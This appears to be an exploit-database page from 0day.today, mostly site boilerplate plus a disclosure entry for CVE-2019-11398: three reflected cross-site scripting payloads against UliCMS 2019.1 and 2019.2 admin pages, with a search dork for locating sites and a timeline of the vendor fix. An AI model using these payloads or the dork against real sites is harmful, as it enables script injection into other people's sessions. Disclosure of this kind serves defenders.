0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting Exploit
Author
Risk
[
Security Risk Low
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting # Google Dork: intext:"by UliCMS" # Exploit Author: Kağan EĞLENCE # Vendor Homepage: https://en.ulicms.de/ # Version: 2019.2 , 2019.1 # CVE : CVE-2019-11398 ### Vulnerability 1 Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1) Vulnerable File : /ulicms/admin/inc/loginform.php Request Type: GET Vulnerable Parameter : "go" Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1) Result : <input type="hidden" name="go" value='asd' accesskey='X' onclick='alert(1)'> ### Vulnerability 2 Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1) Vulnerable File : /ulicms/admin/inc/registerform.php Request Type: GET Vulnerable Parameter : "go" Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1) Result : <input type="hidden" name="go" value='asd' accesskey='X' onclick='alert(1)'> ### Vulnerability 3 - Authenticated Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E Request Type: GET Vulnerable Parameter : "error" Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E ### History ============= 2019-04-13 Issue discovered 2019-04-13 Vendor contacted 2019-04-13 Vendor response and hotfix 2019-04-14 Vendor releases fixed versions 2019-04-22 Advisory release # 0day.today [2024-11-15] #